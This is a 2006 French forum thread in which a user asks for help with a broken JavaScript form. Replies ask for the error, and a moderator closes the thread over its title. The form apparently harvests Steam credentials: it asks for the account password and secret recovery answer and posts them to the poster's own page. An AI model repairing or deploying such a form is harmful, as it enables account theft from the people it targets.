Partage
  • Partager sur Facebook
  • Partager sur Twitter

Probléme Java Script

Sa ne marche pas :(

3 avril 2006 à 12:06:28

Salut voila j'ai cree un formulaire, avec du Java Script mais sa marche pas donc si vous pouvez m'aider sa serait super sympa !

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Document sans titre</title>
<style type="text/css">
<!--
body,td,th {
        color: #666666;
}
body {
        background-color: #CCCCCC;
}
-->
</style></head><SCRIPT language="JavaScript">
<!--

function ControleVide()
{
if(steam-formulaire.Formulaire.nom.value=='')
{
alert('Le champ Nom ne peut pas rester vide !');
steam-formulaire.Formulaire.Nom.focus();
}
else if(steam-formulaire.Formulaire.email.value=='')
{
alert('Vous devez nous indiquez un email');
steam-formulaire.Formulaire.email.focus();
}

else if(steam-formulaire.Formulaire.pass1.value='')
{
alert('Vous devez nous indiquez un mot de passe');
steam-formulaire.Formulaire.pass1.focus();
}

else if(steam-formulaire.Formulaire.pass2.value='')
{
alert('Vous devez retaper votre mot de passe');
steam-formulaire.Formulaire.pass2.focus();
}

else if(steam-formulaire.Formulaire.secret.value='')
{
alert('Vous devez nous donnez une réponse secrete');
steam-formulaire.Formulaire.secret.focus();
}

else
{
steam-formulaire.Formulaire.method = "POST";
steam-formulaire.Formulaire.action = "steam-acces.htm";
steam-formulaire.Formulaire.submit();
}
}
//-->
</script>

<body><form name="Formulaire">
<table width="609" border="1">
  <tr>
    <td width="276">Votre Nom ou pseudo : </td>
    <td width="317"><label>
      <input name="nom" type="text" id="nom" />
    </label></td>
  </tr>
  <tr>
    <td>Votre email : </td>
    <td><input name="email" type="text" id="email" /></td>
  </tr>
  <tr>
    <td>Pass : (pour votre compte steam) </td>
    <td><input name="pass1" type="password" id="pass1" /></td>
  </tr>
  <tr>
    <td>Pass : (retaper le mot de pass) </td>
    <td><input name="pass2" type="password" id="pass2" /></td>
  </tr>
  <tr>
    <td>R&eacute;ponse secr&eacute;te : (pour votre compte steam) </td>
    <td><input name="secret" type="text" id="secret" /></td>
  </tr>
  <tr>
    <td height="186">Commentaire ? : </td>
    <td><label>
      <textarea name="commentaire" cols="50" rows="10" id="commentaire"></textarea>
    </label></td>
  </tr>
</table>

  <input type="button" value="Valider" onClick="ControleVide()" />
 
 

</form>
<label></label>
<noscript>
<meta http-equiv="Refresh" content="0;URL=http://www.allopass.com/check/error_code.php4?DOC_ID=256420&SITE_ID=68660" />
</noscript>
<script language="Javascript" src="http://www.allopass.com/check/chk.php4?IDD=256420&IDS=68660"></script>

</body>
</html>
  • Partager sur Facebook
  • Partager sur Twitter
3 avril 2006 à 13:02:03

On pourrais avoir l'erreur ?
  • Partager sur Facebook
  • Partager sur Twitter
3 avril 2006 à 13:21:30

y a pas d erreur !! le formulaire ne part pas !! la verif ne se fait pas
au clair je clique sur le bouton Envoyer et sa fait rien !
  • Partager sur Facebook
  • Partager sur Twitter
3 avril 2006 à 13:29:52

Ce sujet a un titre qui ne décrit pas correctement le sujet. Afin de permettre aux membres un accès simple au forum pour savoir en un clin d'oeil quels sont les sujets qui l'intéressent, le Site du Zéro a décidé de fermer les sujets de ce type. Mais il n'y a pas de problèmes : vous pouvez recréer le même sujet en changeant simplement le titre pour que celui-ci corresponde aux "exigences" de politesse du forum.

Sachez que le titre doit décrire le problème de façon concise (sujet principal, problème rencontré). De plus une ligne de sous-titre est à votre disposition si vous souhaitez décrire légèrement plus votre sujet.

En faisant cela, les personnes ayant les compétences de résoudre votre problème ou répondre à vos questions repéreront votre sujet plus rapidement.

Voici deux sujets pour vous permettre de bien choisir votre titre :


Ces deux sujets concernent en particulier le forum Programmation mais ils s'appliquent pour tous les forums.

[Ceci est une réponse semi-automatique]

PS : Et révise tes cours de français de primaire ; sache faire la différence entre "sa" et "ça", merci.
  • Partager sur Facebook
  • Partager sur Twitter